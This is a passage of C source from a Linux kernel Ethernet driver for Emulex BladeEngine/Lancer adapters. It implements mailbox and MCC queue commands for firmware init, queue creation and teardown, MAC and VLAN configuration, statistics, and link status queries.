be_mbox_db_ready_wait(adapter, db); if (status != 0) return status; val |= MPU_MAILBOX_DB_HI_MASK; /* at bits 2 - 31 place mbox dma addr msb bits 34 - 63 */ val |= (upper_32_bits(mbox_mem->dma) >> 2) << 2; iowrite32(val, db); /* wait for ready to be set */ status = be_mbox_db_ready_wait(adapter, db); if (status != 0) return status; val = 0; /* at bits 2 - 31 place mbox dma addr lsb bits 4 - 33 */ val |= (u32)(mbox_mem->dma >> 4) << 2; iowrite32(val, db); status = be_mbox_db_ready_wait(adapter, db); if (status != 0) return status; /* A cq entry has been made now */ if (be_mcc_compl_is_new(compl)) { status = be_mcc_compl_process(adapter, &mbox->compl); be_mcc_compl_use(compl); if (status) return status; } else { dev_err(&adapter->pdev->dev, "invalid mailbox completion\n"); return -1; } return 0; } static int be_POST_stage_get(struct be_adapter *adapter, u16 *stage) { u32 sem; if (lancer_chip(adapter)) sem = ioread32(adapter->db + 
MPU_EP_SEMAPHORE_IF_TYPE2_OFFSET); else sem = ioread32(adapter->csr + MPU_EP_SEMAPHORE_OFFSET); *stage = sem & EP_SEMAPHORE_POST_STAGE_MASK; if ((sem >> EP_SEMAPHORE_POST_ERR_SHIFT) & EP_SEMAPHORE_POST_ERR_MASK) return -1; else return 0; } int be_cmd_POST(struct be_adapter *adapter) { u16 stage; int status, timeout = 0; struct device *dev = &adapter->pdev->dev; do { status = be_POST_stage_get(adapter, &stage); if (status) { dev_err(dev, "POST error; stage=0x%x\n", stage); return -1; } else if (stage != POST_STAGE_ARMFW_RDY) { if (msleep_interruptible(2000)) { dev_err(dev, "Waiting for POST aborted\n"); return -EINTR; } timeout += 2; } else { return 0; } } while (timeout < 60); dev_err(dev, "POST timeout; stage=0x%x\n", stage); return -1; } static inline struct be_sge *nonembedded_sgl(struct be_mcc_wrb *wrb) { return &wrb->payload.sgl[0]; } /* Don't touch the hdr after it's prepared */ /* mem will be NULL for embedded commands */ static void be_wrb_cmd_hdr_prepare(struct be_cmd_req_hdr *req_hdr, u8 subsystem, u8 opcode, int cmd_len, struct be_mcc_wrb *wrb, struct be_dma_mem *mem) { struct be_sge *sge; req_hdr->opcode = opcode; req_hdr->subsystem = subsystem; req_hdr->request_length = cpu_to_le32(cmd_len - sizeof(*req_hdr)); req_hdr->version = 0; wrb->tag0 = opcode; wrb->tag1 = subsystem; wrb->payload_length = cmd_len; if (mem) { wrb->embedded |= (1 & MCC_WRB_SGE_CNT_MASK) << MCC_WRB_SGE_CNT_SHIFT; sge = nonembedded_sgl(wrb); sge->pa_hi = cpu_to_le32(upper_32_bits(mem->dma)); sge->pa_lo = cpu_to_le32(mem->dma & 0xFFFFFFFF); sge->len = cpu_to_le32(mem->size); } else wrb->embedded |= MCC_WRB_EMBEDDED_MASK; be_dws_cpu_to_le(wrb, 8); } static void be_cmd_page_addrs_prepare(struct phys_addr *pages, u32 max_pages, struct be_dma_mem *mem) { int i, buf_pages = min(PAGES_4K_SPANNED(mem->va, mem->size), max_pages); u64 dma = (u64)mem->dma; for (i = 0; i < buf_pages; i++) { pages[i].lo = cpu_to_le32(dma & 0xFFFFFFFF); pages[i].hi = cpu_to_le32(upper_32_bits(dma)); dma += 
PAGE_SIZE_4K; } } /* Converts interrupt delay in microseconds to multiplier value */ static u32 eq_delay_to_mult(u32 usec_delay) { #define MAX_INTR_RATE 651042 const u32 round = 10; u32 multiplier; if (usec_delay == 0) multiplier = 0; else { u32 interrupt_rate = 1000000 / usec_delay; /* Max delay, corresponding to the lowest interrupt rate */ if (interrupt_rate == 0) multiplier = 1023; else { multiplier = (MAX_INTR_RATE - interrupt_rate) * round; multiplier /= interrupt_rate; /* Round the multiplier to the closest value.*/ multiplier = (multiplier + round/2) / round; multiplier = min(multiplier, (u32)1023); } } return multiplier; } static inline struct be_mcc_wrb *wrb_from_mbox(struct be_adapter *adapter) { struct be_dma_mem *mbox_mem = &adapter->mbox_mem; struct be_mcc_wrb *wrb = &((struct be_mcc_mailbox *)(mbox_mem->va))->wrb; memset(wrb, 0, sizeof(*wrb)); return wrb; } static struct be_mcc_wrb *wrb_from_mccq(struct be_adapter *adapter) { struct be_queue_info *mccq = &adapter->mcc_obj.q; struct be_mcc_wrb *wrb; if (atomic_read(&mccq->used) >= mccq->len) { dev_err(&adapter->pdev->dev, "Out of MCCQ wrbs\n"); return NULL; } wrb = queue_head_node(mccq); queue_head_inc(mccq); atomic_inc(&mccq->used); memset(wrb, 0, sizeof(*wrb)); return wrb; } /* Tell fw we're about to start firing cmds by writing a * special pattern across the wrb hdr; uses mbox */ int be_cmd_fw_init(struct be_adapter *adapter) { u8 *wrb; int status; if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = (u8 *)wrb_from_mbox(adapter); *wrb++ = 0xFF; *wrb++ = 0x12; *wrb++ = 0x34; *wrb++ = 0xFF; *wrb++ = 0xFF; *wrb++ = 0x56; *wrb++ = 0x78; *wrb = 0xFF; status = be_mbox_notify_wait(adapter); mutex_unlock(&adapter->mbox_lock); return status; } /* Tell fw we're done with firing cmds by writing a * special pattern across the wrb hdr; uses mbox */ int be_cmd_fw_clean(struct be_adapter *adapter) { u8 *wrb; int status; if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = (u8 
*)wrb_from_mbox(adapter); *wrb++ = 0xFF; *wrb++ = 0xAA; *wrb++ = 0xBB; *wrb++ = 0xFF; *wrb++ = 0xFF; *wrb++ = 0xCC; *wrb++ = 0xDD; *wrb = 0xFF; status = be_mbox_notify_wait(adapter); mutex_unlock(&adapter->mbox_lock); return status; } int be_cmd_eq_create(struct be_adapter *adapter, struct be_queue_info *eq, int eq_delay) { struct be_mcc_wrb *wrb; struct be_cmd_req_eq_create *req; struct be_dma_mem *q_mem = &eq->dma_mem; int status; if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_EQ_CREATE, sizeof(*req), wrb, NULL); req->num_pages = cpu_to_le16(PAGES_4K_SPANNED(q_mem->va, q_mem->size)); AMAP_SET_BITS(struct amap_eq_context, valid, req->context, 1); /* 4byte eqe*/ AMAP_SET_BITS(struct amap_eq_context, size, req->context, 0); AMAP_SET_BITS(struct amap_eq_context, count, req->context, __ilog2_u32(eq->len/256)); AMAP_SET_BITS(struct amap_eq_context, delaymult, req->context, eq_delay_to_mult(eq_delay)); be_dws_cpu_to_le(req->context, sizeof(req->context)); be_cmd_page_addrs_prepare(req->pages, ARRAY_SIZE(req->pages), q_mem); status = be_mbox_notify_wait(adapter); if (!status) { struct be_cmd_resp_eq_create *resp = embedded_payload(wrb); eq->id = le16_to_cpu(resp->eq_id); eq->created = true; } mutex_unlock(&adapter->mbox_lock); return status; } /* Use MCC */ int be_cmd_mac_addr_query(struct be_adapter *adapter, u8 *mac_addr, u8 type, bool permanent, u32 if_handle, u32 pmac_id) { struct be_mcc_wrb *wrb; struct be_cmd_req_mac_query *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_NTWK_MAC_QUERY, sizeof(*req), wrb, NULL); req->type = type; if (permanent) { req->permanent = 1; } else { req->if_id = cpu_to_le16((u16) if_handle); req->pmac_id = cpu_to_le32(pmac_id); 
req->permanent = 0; } status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_mac_query *resp = embedded_payload(wrb); memcpy(mac_addr, resp->mac.addr, ETH_ALEN); } err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses synchronous MCCQ */ int be_cmd_pmac_add(struct be_adapter *adapter, u8 *mac_addr, u32 if_id, u32 *pmac_id, u32 domain) { struct be_mcc_wrb *wrb; struct be_cmd_req_pmac_add *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_NTWK_PMAC_ADD, sizeof(*req), wrb, NULL); req->hdr.domain = domain; req->if_id = cpu_to_le32(if_id); memcpy(req->mac_address, mac_addr, ETH_ALEN); status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_pmac_add *resp = embedded_payload(wrb); *pmac_id = le32_to_cpu(resp->pmac_id); } err: spin_unlock_bh(&adapter->mcc_lock); if (status == MCC_STATUS_UNAUTHORIZED_REQUEST) status = -EPERM; return status; } /* Uses synchronous MCCQ */ int be_cmd_pmac_del(struct be_adapter *adapter, u32 if_id, int pmac_id, u32 dom) { struct be_mcc_wrb *wrb; struct be_cmd_req_pmac_del *req; int status; if (pmac_id == -1) return 0; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_NTWK_PMAC_DEL, sizeof(*req), wrb, NULL); req->hdr.domain = dom; req->if_id = cpu_to_le32(if_id); req->pmac_id = cpu_to_le32(pmac_id); status = be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses Mbox */ int be_cmd_cq_create(struct be_adapter *adapter, struct be_queue_info *cq, struct be_queue_info *eq, bool no_delay, int coalesce_wm) { struct be_mcc_wrb *wrb; struct be_cmd_req_cq_create *req; struct be_dma_mem *q_mem = &cq->dma_mem; void *ctxt; int status; if 
(mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); req = embedded_payload(wrb); ctxt = &req->context; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_CQ_CREATE, sizeof(*req), wrb, NULL); req->num_pages = cpu_to_le16(PAGES_4K_SPANNED(q_mem->va, q_mem->size)); if (lancer_chip(adapter)) { req->hdr.version = 2; req->page_size = 1; /* 1 for 4K */ AMAP_SET_BITS(struct amap_cq_context_lancer, nodelay, ctxt, no_delay); AMAP_SET_BITS(struct amap_cq_context_lancer, count, ctxt, __ilog2_u32(cq->len/256)); AMAP_SET_BITS(struct amap_cq_context_lancer, valid, ctxt, 1); AMAP_SET_BITS(struct amap_cq_context_lancer, eventable, ctxt, 1); AMAP_SET_BITS(struct amap_cq_context_lancer, eqid, ctxt, eq->id); } else { AMAP_SET_BITS(struct amap_cq_context_be, coalescwm, ctxt, coalesce_wm); AMAP_SET_BITS(struct amap_cq_context_be, nodelay, ctxt, no_delay); AMAP_SET_BITS(struct amap_cq_context_be, count, ctxt, __ilog2_u32(cq->len/256)); AMAP_SET_BITS(struct amap_cq_context_be, valid, ctxt, 1); AMAP_SET_BITS(struct amap_cq_context_be, eventable, ctxt, 1); AMAP_SET_BITS(struct amap_cq_context_be, eqid, ctxt, eq->id); } be_dws_cpu_to_le(ctxt, sizeof(req->context)); be_cmd_page_addrs_prepare(req->pages, ARRAY_SIZE(req->pages), q_mem); status = be_mbox_notify_wait(adapter); if (!status) { struct be_cmd_resp_cq_create *resp = embedded_payload(wrb); cq->id = le16_to_cpu(resp->cq_id); cq->created = true; } mutex_unlock(&adapter->mbox_lock); return status; } static u32 be_encoded_q_len(int q_len) { u32 len_encoded = fls(q_len); /* log2(len) + 1 */ if (len_encoded == 16) len_encoded = 0; return len_encoded; } int be_cmd_mccq_ext_create(struct be_adapter *adapter, struct be_queue_info *mccq, struct be_queue_info *cq) { struct be_mcc_wrb *wrb; struct be_cmd_req_mcc_ext_create *req; struct be_dma_mem *q_mem = &mccq->dma_mem; void *ctxt; int status; if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); req = 
embedded_payload(wrb); ctxt = &req->context; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_MCC_CREATE_EXT, sizeof(*req), wrb, NULL); req->num_pages = cpu_to_le16(PAGES_4K_SPANNED(q_mem->va, q_mem->size)); if (lancer_chip(adapter)) { req->hdr.version = 1; req->cq_id = cpu_to_le16(cq->id); AMAP_SET_BITS(struct amap_mcc_context_lancer, ring_size, ctxt, be_encoded_q_len(mccq->len)); AMAP_SET_BITS(struct amap_mcc_context_lancer, valid, ctxt, 1); AMAP_SET_BITS(struct amap_mcc_context_lancer, async_cq_id, ctxt, cq->id); AMAP_SET_BITS(struct amap_mcc_context_lancer, async_cq_valid, ctxt, 1); } else { AMAP_SET_BITS(struct amap_mcc_context_be, valid, ctxt, 1); AMAP_SET_BITS(struct amap_mcc_context_be, ring_size, ctxt, be_encoded_q_len(mccq->len)); AMAP_SET_BITS(struct amap_mcc_context_be, cq_id, ctxt, cq->id); } /* Subscribe to Link State and Group 5 Events(bits 1 and 5 set) */ req->async_event_bitmap[0] = cpu_to_le32(0x00000022); be_dws_cpu_to_le(ctxt, sizeof(req->context)); be_cmd_page_addrs_prepare(req->pages, ARRAY_SIZE(req->pages), q_mem); status = be_mbox_notify_wait(adapter); if (!status) { struct be_cmd_resp_mcc_create *resp = embedded_payload(wrb); mccq->id = le16_to_cpu(resp->id); mccq->created = true; } mutex_unlock(&adapter->mbox_lock); return status; } int be_cmd_mccq_org_create(struct be_adapter *adapter, struct be_queue_info *mccq, struct be_queue_info *cq) { struct be_mcc_wrb *wrb; struct be_cmd_req_mcc_create *req; struct be_dma_mem *q_mem = &mccq->dma_mem; void *ctxt; int status; if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); req = embedded_payload(wrb); ctxt = &req->context; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_MCC_CREATE, sizeof(*req), wrb, NULL); req->num_pages = cpu_to_le16(PAGES_4K_SPANNED(q_mem->va, q_mem->size)); AMAP_SET_BITS(struct amap_mcc_context_be, valid, ctxt, 1); AMAP_SET_BITS(struct amap_mcc_context_be, ring_size, ctxt, 
be_encoded_q_len(mccq->len)); AMAP_SET_BITS(struct amap_mcc_context_be, cq_id, ctxt, cq->id); be_dws_cpu_to_le(ctxt, sizeof(req->context)); be_cmd_page_addrs_prepare(req->pages, ARRAY_SIZE(req->pages), q_mem); status = be_mbox_notify_wait(adapter); if (!status) { struct be_cmd_resp_mcc_create *resp = embedded_payload(wrb); mccq->id = le16_to_cpu(resp->id); mccq->created = true; } mutex_unlock(&adapter->mbox_lock); return status; } int be_cmd_mccq_create(struct be_adapter *adapter, struct be_queue_info *mccq, struct be_queue_info *cq) { int status; status = be_cmd_mccq_ext_create(adapter, mccq, cq); if (status && !lancer_chip(adapter)) { dev_warn(&adapter->pdev->dev, "Upgrade to F/W ver 2.102.235.0 " "or newer to avoid conflicting priorities between NIC " "and FCoE traffic"); status = be_cmd_mccq_org_create(adapter, mccq, cq); } return status; } int be_cmd_txq_create(struct be_adapter *adapter, struct be_queue_info *txq, struct be_queue_info *cq) { struct be_mcc_wrb *wrb; struct be_cmd_req_eth_tx_create *req; struct be_dma_mem *q_mem = &txq->dma_mem; void *ctxt; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); ctxt = &req->context; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_ETH, OPCODE_ETH_TX_CREATE, sizeof(*req), wrb, NULL); if (lancer_chip(adapter)) { req->hdr.version = 1; AMAP_SET_BITS(struct amap_tx_context, if_id, ctxt, adapter->if_handle); } req->num_pages = PAGES_4K_SPANNED(q_mem->va, q_mem->size); req->ulp_num = BE_ULP1_NUM; req->type = BE_ETH_TX_RING_TYPE_STANDARD; AMAP_SET_BITS(struct amap_tx_context, tx_ring_size, ctxt, be_encoded_q_len(txq->len)); AMAP_SET_BITS(struct amap_tx_context, ctx_valid, ctxt, 1); AMAP_SET_BITS(struct amap_tx_context, cq_id_send, ctxt, cq->id); be_dws_cpu_to_le(ctxt, sizeof(req->context)); be_cmd_page_addrs_prepare(req->pages, ARRAY_SIZE(req->pages), q_mem); status = be_mcc_notify_wait(adapter); if (!status) { struct 
be_cmd_resp_eth_tx_create *resp = embedded_payload(wrb); txq->id = le16_to_cpu(resp->cid); txq->created = true; } err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses MCC */ int be_cmd_rxq_create(struct be_adapter *adapter, struct be_queue_info *rxq, u16 cq_id, u16 frag_size, u32 if_id, u32 rss, u8 *rss_id) { struct be_mcc_wrb *wrb; struct be_cmd_req_eth_rx_create *req; struct be_dma_mem *q_mem = &rxq->dma_mem; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_ETH, OPCODE_ETH_RX_CREATE, sizeof(*req), wrb, NULL); req->cq_id = cpu_to_le16(cq_id); req->frag_size = fls(frag_size) - 1; req->num_pages = 2; be_cmd_page_addrs_prepare(req->pages, ARRAY_SIZE(req->pages), q_mem); req->interface_id = cpu_to_le32(if_id); req->max_frame_size = cpu_to_le16(BE_MAX_JUMBO_FRAME_SIZE); req->rss_queue = cpu_to_le32(rss); status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_eth_rx_create *resp = embedded_payload(wrb); rxq->id = le16_to_cpu(resp->id); rxq->created = true; *rss_id = resp->rss_id; } err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Generic destroyer function for all types of queues * Uses Mbox */ int be_cmd_q_destroy(struct be_adapter *adapter, struct be_queue_info *q, int queue_type) { struct be_mcc_wrb *wrb; struct be_cmd_req_q_destroy *req; u8 subsys = 0, opcode = 0; int status; if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); req = embedded_payload(wrb); switch (queue_type) { case QTYPE_EQ: subsys = CMD_SUBSYSTEM_COMMON; opcode = OPCODE_COMMON_EQ_DESTROY; break; case QTYPE_CQ: subsys = CMD_SUBSYSTEM_COMMON; opcode = OPCODE_COMMON_CQ_DESTROY; break; case QTYPE_TXQ: subsys = CMD_SUBSYSTEM_ETH; opcode = OPCODE_ETH_TX_DESTROY; break; case QTYPE_RXQ: subsys = CMD_SUBSYSTEM_ETH; opcode = OPCODE_ETH_RX_DESTROY; break; case QTYPE_MCCQ: subsys = 
CMD_SUBSYSTEM_COMMON; opcode = OPCODE_COMMON_MCC_DESTROY; break; default: BUG(); } be_wrb_cmd_hdr_prepare(&req->hdr, subsys, opcode, sizeof(*req), wrb, NULL); req->id = cpu_to_le16(q->id); status = be_mbox_notify_wait(adapter); if (!status) q->created = false; mutex_unlock(&adapter->mbox_lock); return status; } /* Uses MCC */ int be_cmd_rxq_destroy(struct be_adapter *adapter, struct be_queue_info *q) { struct be_mcc_wrb *wrb; struct be_cmd_req_q_destroy *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_ETH, OPCODE_ETH_RX_DESTROY, sizeof(*req), wrb, NULL); req->id = cpu_to_le16(q->id); status = be_mcc_notify_wait(adapter); if (!status) q->created = false; err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Create an rx filtering policy configuration on an i/f * Uses MCCQ */ int be_cmd_if_create(struct be_adapter *adapter, u32 cap_flags, u32 en_flags, u8 *mac, u32 *if_handle, u32 *pmac_id, u32 domain) { struct be_mcc_wrb *wrb; struct be_cmd_req_if_create *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_NTWK_INTERFACE_CREATE, sizeof(*req), wrb, NULL); req->hdr.domain = domain; req->capability_flags = cpu_to_le32(cap_flags); req->enable_flags = cpu_to_le32(en_flags); if (mac) memcpy(req->mac_addr, mac, ETH_ALEN); else req->pmac_invalid = true; status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_if_create *resp = embedded_payload(wrb); *if_handle = le32_to_cpu(resp->interface_id); if (mac) *pmac_id = le32_to_cpu(resp->pmac_id); } err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses MCCQ */ int be_cmd_if_destroy(struct be_adapter *adapter, int interface_id, u32 domain) { struct be_mcc_wrb *wrb; struct 
be_cmd_req_if_destroy *req; int status; if (interface_id == -1) return 0; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_NTWK_INTERFACE_DESTROY, sizeof(*req), wrb, NULL); req->hdr.domain = domain; req->interface_id = cpu_to_le32(interface_id); status = be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Get stats is a non embedded command: the request is not embedded inside * WRB but is a separate dma memory block * Uses asynchronous MCC */ int be_cmd_get_stats(struct be_adapter *adapter, struct be_dma_mem *nonemb_cmd) { struct be_mcc_wrb *wrb; struct be_cmd_req_hdr *hdr; int status = 0; if (MODULO(adapter->work_counter, be_get_temp_freq) == 0) be_cmd_get_die_temperature(adapter); spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } hdr = nonemb_cmd->va; be_wrb_cmd_hdr_prepare(hdr, CMD_SUBSYSTEM_ETH, OPCODE_ETH_GET_STATISTICS, nonemb_cmd->size, wrb, nonemb_cmd); if (adapter->generation == BE_GEN3) hdr->version = 1; be_mcc_notify(adapter); adapter->stats_cmd_sent = true; err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Lancer Stats */ int lancer_cmd_get_pport_stats(struct be_adapter *adapter, struct be_dma_mem *nonemb_cmd) { struct be_mcc_wrb *wrb; struct lancer_cmd_req_pport_stats *req; int status = 0; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = nonemb_cmd->va; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_ETH, OPCODE_ETH_GET_PPORT_STATS, nonemb_cmd->size, wrb, nonemb_cmd); req->cmd_params.params.pport_num = cpu_to_le16(adapter->port_num); req->cmd_params.params.reset_stats = 0; be_mcc_notify(adapter); adapter->stats_cmd_sent = true; err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses synchronous mcc */ int 
be_cmd_link_status_query(struct be_adapter *adapter, u8 *mac_speed, u16 *link_speed, u8 *link_status, u32 dom) { struct be_mcc_wrb *wrb; struct be_cmd_req_link_status *req; int status; spin_lock_bh(&adapter->mcc_lock); if (link_status) *link_status = LINK_DOWN; wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_NTWK_LINK_STATUS_QUERY, sizeof(*req), wrb, NULL); if (adapter->generation == BE_GEN3 || lancer_chip(adapter)) req->hdr.version = 1; req->hdr.domain = dom; status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_link_status *resp = embedded_payload(wrb); if (resp->mac_speed != PHY_LINK_SPEED_ZERO) { if (link_speed) *link_speed = le16_to_cpu(resp->link_speed); if (mac_speed) *mac_speed = resp->mac_speed; } if (link_status) *link_status = resp->logical_link_status; } err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses synchronous mcc */ int be_cmd_get_die_temperature(struct be_adapter *adapter) { struct be_mcc_wrb *wrb; struct be_cmd_req_get_cntl_addnl_attribs *req; u16 mccq_index; int status; spin_lock_bh(&adapter->mcc_lock); mccq_index = adapter->mcc_obj.q.head; wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_GET_CNTL_ADDITIONAL_ATTRIBUTES, sizeof(*req), wrb, NULL); wrb->tag1 = mccq_index; be_mcc_notify(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses synchronous mcc */ int be_cmd_get_reg_len(struct be_adapter *adapter, u32 *log_size) { struct be_mcc_wrb *wrb; struct be_cmd_req_get_fat *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_MANAGE_FAT, sizeof(*req), wrb, NULL); req->fat_operation = 
cpu_to_le32(QUERY_FAT); status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_get_fat *resp = embedded_payload(wrb); if (log_size && resp->log_size) *log_size = le32_to_cpu(resp->log_size) - sizeof(u32); } err: spin_unlock_bh(&adapter->mcc_lock); return status; } void be_cmd_get_regs(struct be_adapter *adapter, u32 buf_len, void *buf) { struct be_dma_mem get_fat_cmd; struct be_mcc_wrb *wrb; struct be_cmd_req_get_fat *req; u32 offset = 0, total_size, buf_size, log_offset = sizeof(u32), payload_len; int status; if (buf_len == 0) return; total_size = buf_len; get_fat_cmd.size = sizeof(struct be_cmd_req_get_fat) + 60*1024; get_fat_cmd.va = pci_alloc_consistent(adapter->pdev, get_fat_cmd.size, &get_fat_cmd.dma); if (!get_fat_cmd.va) { status = -ENOMEM; dev_err(&adapter->pdev->dev, "Memory allocation failure while retrieving FAT data\n"); return; } spin_lock_bh(&adapter->mcc_lock); while (total_size) { buf_size = min(total_size, (u32)60*1024); total_size -= buf_size; wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = get_fat_cmd.va; payload_len = sizeof(struct be_cmd_req_get_fat) + buf_size; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_MANAGE_FAT, payload_len, wrb, &get_fat_cmd); req->fat_operation = cpu_to_le32(RETRIEVE_FAT); req->read_log_offset = cpu_to_le32(log_offset); req->read_log_length = cpu_to_le32(buf_size); req->data_buffer_size = cpu_to_le32(buf_size); status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_get_fat *resp = get_fat_cmd.va; memcpy(buf + offset, resp->data_buffer, le32_to_cpu(resp->read_log_length)); } else { dev_err(&adapter->pdev->dev, "FAT Table Retrieve error\n"); goto err; } offset += buf_size; log_offset += buf_size; } err: pci_free_consistent(adapter->pdev, get_fat_cmd.size, get_fat_cmd.va, get_fat_cmd.dma); spin_unlock_bh(&adapter->mcc_lock); } /* Uses synchronous mcc */ int be_cmd_get_fw_ver(struct be_adapter *adapter, char *fw_ver, char *fw_on_flash) 
{ struct be_mcc_wrb *wrb; struct be_cmd_req_get_fw_version *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_GET_FW_VERSION, sizeof(*req), wrb, NULL); status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_get_fw_version *resp = embedded_payload(wrb); strcpy(fw_ver, resp->firmware_version_string); if (fw_on_flash) strcpy(fw_on_flash, resp->fw_on_flash_version_string); } err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* set the EQ delay interval of an EQ to specified value * Uses async mcc */ int be_cmd_modify_eqd(struct be_adapter *adapter, u32 eq_id, u32 eqd) { struct be_mcc_wrb *wrb; struct be_cmd_req_modify_eq_delay *req; int status = 0; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_MODIFY_EQ_DELAY, sizeof(*req), wrb, NULL); req->num_eq = cpu_to_le32(1); req->delay[0].eq_id = cpu_to_le32(eq_id); req->delay[0].phase = 0; req->delay[0].delay_multiplier = cpu_to_le32(eqd); be_mcc_notify(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses sycnhronous mcc */ int be_cmd_vlan_config(struct be_adapter *adapter, u32 if_id, u16 *vtag_array, u32 num, bool untagged, bool promiscuous) { struct be_mcc_wrb *wrb; struct be_cmd_req_vlan_config *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_NTWK_VLAN_CONFIG, sizeof(*req), wrb, NULL); req->interface_id = if_id; req->promiscuous = promiscuous; req->untagged = untagged; req->num_vlan = num; if (!promiscuous) { memcpy(req->normal_vlan, vtag_array, req->num_vlan * sizeof(vtag_array[0])); 
